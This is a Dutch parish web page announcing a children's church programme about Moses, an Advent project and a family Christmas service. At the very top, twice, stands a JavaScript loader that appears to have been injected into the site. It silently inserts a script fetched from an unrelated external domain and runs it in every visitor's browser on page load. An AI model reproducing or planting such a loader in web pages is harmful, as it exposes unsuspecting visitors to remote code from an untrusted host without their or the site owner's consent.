;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nieuw thema en Advent/kerstproject Bernetsjerke!! - PKN Damwâld

Nieuw thema en Advent/kerstproject Bernetsjerke!!

Gepubliceerd op: maandag 31 oktober 2016

Nieuw thema en Advent/kerstproject Bernetsjerke!!  Elke zondagmorgen voor de groep 1 tot en met 8 van de basisschool in De Ontmoeting.
Ook al ligt de herfstvakantie bij het schrijven van dit stukje nog maar net achter ons, toch bevindt de Bernetsjerke zich alweer in vakantiesferen. We gaan namelijk op reis met Mozes tijdens het tweede thema van dit seizoen, geheten: “Gods volk op reis”!
De reis krijgt een ‘jungle tintje’, waarbij het dierenverzorgerspak van de Jezus Zoo (van het vorige Paasproject) weer uit de kast wordt getrokken….
De kinderen leren tijdens vier zondagen over het gehoorzamen aan God, waarbij er aan de brandende braamstruik, manna in de woestijn, de 10 geboden en de spionnen in Kanaän onder andere aandacht wordt besteed.
Op 27 november gaan we weer los met het Adventproject: “Wie weg is wordt gezien! Ja, je leest het goed… je wordt gezien. In dit project ontdekken kinderen dat God mensen steeds weer opzoekt. God is steeds op zoek naar verstopplekjes: de woestijn, Nazareth, de stal. Daar vindt Hij mensen: Adam en Eva, Hagar, Jesaja, Maria, de herders. Voorin de kerk geven we hier elke adventszondag een spannend tintje aan…. Ben je nieuwsgierig naar wie er speurwerk komt verrichten, kom dan langs!
God zocht trouwens niet alleen toen mensen op, ook nu nog is Hij bewogen met ons en zoekt Hij ons op. Over dit laatste wordt in de ochtenddienst op Eerste Kerstdag aandacht besteed. Net als vorig jaar willen we hier weer een mooie familiekerstdienst voor jong en oud van maken (er is dus geen kinderkerstfeest). Laat jij/ u je dan ook zoeken? Van harte welkom!
Vriendelijke groet, leidsters en mentoren Bernetsjerke